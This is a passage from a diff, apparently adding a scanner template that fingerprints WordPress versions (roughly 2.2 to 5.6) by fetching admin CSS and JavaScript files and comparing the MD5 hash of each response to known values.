+ dsl: + - "(\"fe5dfd54c06a5ca076027fb6463d53e0\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"0642e47790eb3ebff77ad8451b11bf7d\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a11a31cf8171325483629eaf4cadfe2e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"49800720b23abe08b209608f73d2c60d\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4812195c34e86b684243abbc1d8d1798\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6754ac27669188d7fe33c6699290101a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"830d9f3be0c02ffb4bea5a1bbc8c342c\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"f78d67d8230c458780252e608257665e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"9fbd0c31aaf5fd708bad7ceae55cd1c6\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"4085d31428188b517d4cdc6ed54e9ba1\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"d37e9d97322d003a59cceed023ae1627\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"0de070a44c7ba72af44ccd496608395c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"de068d48d84fefc1c50a0b65253b7d41\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"18cb9cc6eb79acab95454d92d1a6832a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/forms.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"766884f8982e0b24a1ff31017b12687c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"70fa643d71370cbaafe974ad9ca04569\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"ccae6ea537526abc82f16abac64b14fc\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e113d75d86aa496a5aeebc79a426e09a\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ad3c820c92c5f7916448a38c7439bdf9\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"8ab3dc5d6517e5fb1615317ef16d9f7c\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"82a7baa833cfa3cacffe1567f417388e\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"018517f65641a4cfb139781686700457\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"8f95818bedd2456f61d3f82926bbe549\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e8ad927ed99f0cb598babf3c97c08db3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a198106b212083f8421da7a3946757f4\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"7d6a4fb31d233dcee4eba2d3bc781350\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"fd519c207095336bb57294926a09461e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"b4ddb8d0e6def1544aac502784180669\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"3133e7d3687ba997b268a0d0b920f7ca\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"01537666f87f8a05ef7bfabf9e02dd58\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"1b5477771d13050c5543044bf233a88e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"273583b8f46a71877db8a1343ae5c54f\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"47956eace9eccbe53bc9dcc66e1264fd\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"a4e3d3f66e8aa6a5a1e74ea06d5a94c7\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"6e2d5da90f7faf390eb60d3554e2ff58\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"76a6b8c3745571f1ed6aed74029fe6db\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"81be30220791444b0d18847ebbe35ad1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3a62029975958cf5dedeea2b4991082c\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"2497dbd6fa8ed7ec01aaa5cde5b41311\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"abc9cd9c8ba828a3ee119f294425c92a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"658bf53ecc9983a2cc34c2fb10ff4fca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/forms-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"111ecdd53198846995ebd8efec9bcf36\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"195f55f6344af6ab4483de40fcaf6d46\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"42ce72342f0513eef908ca9dbd9305ea\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"7cdd958d566eef0a2bbd01d6f9f9499b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"abf8dd8f42af5684f3d80d6447e1314b\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"03c4f503d77c221c7db24be17eb1883d\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"5d83454881d2a694d0593ae6c209778c\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"62dea19210ec49e75a896a9965799ca4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"fe5319684165959b7b00b618009c3e81\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6dc7476f6b2484c728ed3cd733ac80bb\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"044393b752b8a95cdd5a8ccfccf98c6f\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"ed2dded7dd6599eb0976eb63208b8e8c\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"4719697b45dc80a4b21ac12c129ad378\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"92fa624428349c1a4c9aa6eeee9400a3\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"c1d87fb1e7d4b5f8d925c59f2dcfa076\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"d76404feb79abd2167325e82891123b2\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2113853f02adcfec75306e443c560e3b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0fa8523bd6c90b087064560f29457c1f\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"3eceec285e1cce89f64e729cfa5bbcb7\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"7d0250392ecd5799d667112dd3c6c1d8\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"4c81508db6b5bb1c1c14764862b98360\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"5d93609886b767b6a3f7faee2dbeaea7\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"dc4fc10c6cfd9719b4162726645fceb1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"202c34af21873c6dafca17c5d7506706\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"d010d243e2c088bda116a757e7566bda\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f59d6904ead9d4a9bf1f48cb3b7f9c56\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"dd75b8c4476592195e9b774d0841ab15\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"4423bb74b238cb0e01427506aaf6ad29\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"48babc981cf0f439a769286d6a70fd48\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4d625d7805a6897ba1ee60df12e9aedc\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6dcb8d45250f00e45c0a16d7d437c0d8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"427ae769ce0a7429d7f31ed97c0c3326\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"4bd7f1b4b0aecd69638848b6c37851ff\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f578fae6b47beea325ee8dc1a8551e88\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"71386ae29d2e92d744cd0ffcfe901ff2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"246e5b303936e280ba11653683726659\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2b9341dc649763de1f36a2995bfcfbe1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"8d6aec11f42294c4ae1de3ab84175e2b\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"163d75e9faf70bf4e002638b746af26d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a91b399efcdb75b5975efae2bcbe0588\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7e7fc988037a570623ecdac12c6e523a\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"cc05fe38ba18674e7c6ab01c4dff6e4f\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"eedf339656fe12ca835e797320445e34\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"07c2d345729f31a530872a202078fe3e\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"7ae4b6de28dfa29eaf07b5448e27c47a\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"7585650095d07481bf58bac7737e0d0c\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"56b3176fa896ff69ebea6d6689f1b5df\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"adc9f326e31941258e8e50707a93c1eb\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"eb025ed3405f65138e2fe7cd62b27508\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"3bc7a38b3a83079b9abd2245709f7b2b\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"73fe3708cb1c253dd50d5be65f8777dd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"fe3a02ff20d8154cdd66aad359c8a8e4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6875a80f6acd9176e518bcd86c364a91\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2ca82cd79424ae65f081f348da6f3470\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"38de8fc52993f0f910be3d62a7637c33\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"16375f6512d5a1e04dbb884a02ba658a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"6f3943ff4694f87dae30d02cfba0d89f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"856763d80eab181268a361510f4f2e35\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f8a412c8321caa8f9fc3b9d6ed078740\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"ebd0cc92129d8f29fa8b66daa23215eb\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"fb09060e3a7d4ab6357a830546acb8b2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9369c3961b4f2d155e6a4ea8252e31ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/autosave.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"6cfac42246a04c9f37f0a0e5f0474ee4\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"44521ff25481d95b5d100c55dfdb45f4\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.5.23 + dsl: + - "(\"3f9cc5665ff4fe488894068b1b880d74\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"413b428336916273e3853a581f5ab851\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"63fd697c7d66f00cefc6430b8c53c92f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b14a525c6e9153ceaa71eb4561ac5991\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"fddaef0932cdd73ecf654d5d40a98ff0\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"863c40a4a54cf53e5102a5133faa19f8\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"8a6348b4b6ccb6fdc485912383cddb04\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"2c5edd9df2864f480f946256022c9f44\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"00172ff53b67ee3b773504420e7de431\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"f74c1ba83ff35888d3dd2e3521897db5\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"dd01c7f5e1b9ca4326267bd246dbd770\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c524fa61292b138710930f5ccf1dcd23\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"e617e3e2931143c28cb3514d2db5b583\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"3f03bce84d1d2a169b4bf4d8a0126e38\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"f00b01f80b2ed4e5f6753b602258874c\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"1f09b6343caf9dc71b30d0ff0d90c69b\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"aebe2414d81a87d6c2c9273654035fcd\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"0c2295f3e8ea03dd5346a6abec16a456\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a436fd5bc5fe11fed6acbd8371e09102\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"4d76da5b913eec43f31a10b6c367f43e\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"6e0efaa35b424792e180c3c619b9823f\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9b1d754d27a657a24b8268d87a4a96ad\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"e0024121a80cefb48c958fc6995db24b\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"0b4536fbe48b791795347557f46f4efe\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4536ea8aec28f17e07af54c59db561a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/common-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f4496a75c16e381d993ec316e783f9bb\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"57d1d231d84d16e1068f6af8219c16bb\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1299184d799f3a39b6abfb8510ae2b88\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"04e2e4400bf7e6b04c7a9e0bef9abd92\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"65a579b1e541380cf3336329c84549fa\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.4 + dsl: + - "(\"66c0c54fea80c201db7daabadef8cd8b\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"eca5a62aacdb686c26e850a4529662a8\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"cc1d6cd9b4a4079012a04ec96638bbf4\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"29fc9bc51f8f284c4751acb59307c07a\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"803ea865916c3973a37a371542e92383\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"96c50e7ed61f473ae43fea164c028c5a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"96705cdff8c2ed47003b981751c25d99\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"4f01f1edbe0fd8a3c68bbdac926be2fe\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"a3598123987864a73435983381d38259\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"f6f2b87658db8690a979b86c13bc869f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"e11e33d6475e302b41caa4020143b224\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"1f735128e0e972560912127d06a124cf\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"59b2a3edb413dba510ec0624445d35d7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.1 + dsl: + - "(\"3ef1bf8fd20257c9285115ad1a514cb2\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"de8f811db5ab98f7759282ebc81b4dcb\" == md5(body))" + - type: dsl + name: 5.4.2 - 5.4.4 + dsl: + - "(\"dd21416d0bf77cf56c6e29abe9d806d7\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2844ed0207b54d314de52aa5024a188c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"518511a9badf54b58f9a724a67be1599\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/common-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3ed49f9aee0b3dc258e936fa867da7b7\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"86ccf56bbf7478ef06b2bf12e93bdc3c\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2a0f5af4182bc19d0c8a64a537ea950f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1ed4faf7c47d02536474cfbe258892ba\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8d6461b9e7a10f2635880587e37688c8\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"3b0c7a4c53c44f527276ed85520f94f8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"81f0f785dbd8eee0a11d054a3cbdf606\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f41708257e8e6bc89bd375f82a8bc290\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"e8da14cd4be51ae220b531dcd14d7069\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"eeff6a0a49c73df137e0829b232fafe2\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"a8f65f404867e7d00ef30c4312e4ae5a\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.4 + dsl: + - "(\"3474da40a63cf7441990d7af14e1dd96\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"2a75a758f97514530f0ae7ba984e9392\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"6f94711934da6b3ffb9b7aa44c595613\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"714e9274f3615454701ea9ee0ced8b5f\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"7b8cd77767df9b74c2ba9758a5ae61d4\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"3056f4e370a1881381f87d058a505e13\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"03b3fc0c51132338e6b04efe3111aac9\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"80412e2251dc758231d2aa30ece06d42\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"854e9fea900d9e1b9323337290511600\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"8429b24e45bab0f571f2899f40089316\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"db80bf8f1deb332d3449ed81457ba565\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"58d84231e24daae117fe2385566f19f1\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"6a5851a95ac74681b84c89f34a83d526\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.1 + dsl: + - "(\"4bf51bc15cee9b14c27cd2a228827864\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"a4490a668e75cdfaa5d0155a15c2d785\" == md5(body))" + - type: dsl + name: 5.4.2 - 5.4.4 + dsl: + - "(\"d80fd8aacd4775600a95c8a725924c2c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7f8fceaf55013fd941fb68698f407de0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2103d4b114317943ec992cb762a5b43a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/common.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b1ccd63fd1eb7b7c83e0c18f4a41631e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"19783c0c8c8225b3fc31ea04e77ee50a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2adb75111fe6bd2d079f1a4382e43806\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b8f5ef44ca185e2efe7b8205a2e35e1a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"920d13a170db44958b3e0a3eb6bbf65a\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.4 + dsl: + - "(\"f66191b422f0fb03659565a9fe2cbf31\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"595620900f9d6ee0537856376b500bb6\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"f290461e922fb41355a1cce6d1afcae3\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"d0ab761a7e48baab74afdd85a669c9e6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"17f162d041245ca50ed4f8eda0d3938b\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"cfa9e1f2a74fb8c9181b1a4faffec319\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"acccbab4b6f7167f75de702337c15082\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"2922dadefceb4936fef52c2fd9eca7e5\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"0154ab68beb21987369fe4f9f96e505e\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"404c6d0aec7bd9536097b66367fe609c\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"df5accb5efc55900010fc8dbc7288c0d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"673f08c43f68205d1be3c61e8e643ccb\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"e4c9d150e9d0879e6f4f49e8499db573\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.1 + dsl: + - "(\"87c166494be181c0191a2aa8f5353804\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"ad5ad5176f246f2c063e6b17b204f6fa\" == md5(body))" + - type: dsl + name: 5.4.2 - 5.4.4 + dsl: + - "(\"27484d633876a355cfb93659f226c355\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"780232f685803f5815fbcc8cc34e6f51\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9acd2c0bc2d9c3e1ae244b37a1c16093\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/common.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"94a8c9759cf395d67c51ad99801749b2\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b1992b6de3600f82b893aa6123f2972d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"81aef5364d1de5aff6e2f7577a161564\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"726ff561c2ff8ea1b521774e18fa6be4\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"cf2cfe5b33d2c6a1a2afd50128902698\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f78ebe20922d0a67cacf2ec916d89e1c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"6942f692b44491261619b43859b8acfc\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"64d0b35ed52e9b2c23e5e392a7a430b2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"588b195e5c6ac9aedeaf5a8d15392cac\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"da4a644688036daca94c760935e9667f\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"e52c17a7a6b58bb9f34a9ee0b925dce2\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.4 + dsl: + - "(\"5fff0139cf41e8f2bfc402c8bda13182\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"9d21197ec7821a31b6cb867a509eea42\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"fcd549c0099cc4b73431636d5b34a2d8\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"73f78da3cc978e1a179fb7972723a1e0\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"9410a07983a1c5cbf0f46f54222ae03b\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"6488275ef0769671a1ee7f3aa57288dc\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"984d0a5c5d116af8a4004428f0b5ee20\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"7988ef149cc8447a3a47ae12832e5abb\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"3a83fc2978cd1dd143e2973281aaeb6c\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"f6e888d4a9f434e361e646d0b7d11864\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"8ac7ee2240fd68c28aff2ff4158fbc39\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"9cff57b3df1f72314b4f4fb3668c9fba\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"2561f3fa21e6a465078399f9a3495809\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.1 + dsl: + - "(\"19e7bae79deb7d7598d42ec0a1cf715c\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"e573595eef2d3bfd7767fdec685b1bae\" == md5(body))" + - type: dsl + name: 5.4.2 - 5.4.4 + dsl: + - "(\"4213c7f0717c905c9cd12752a9b8358a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"50d8c6430b9e115b2bf2a0047043b7d2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - 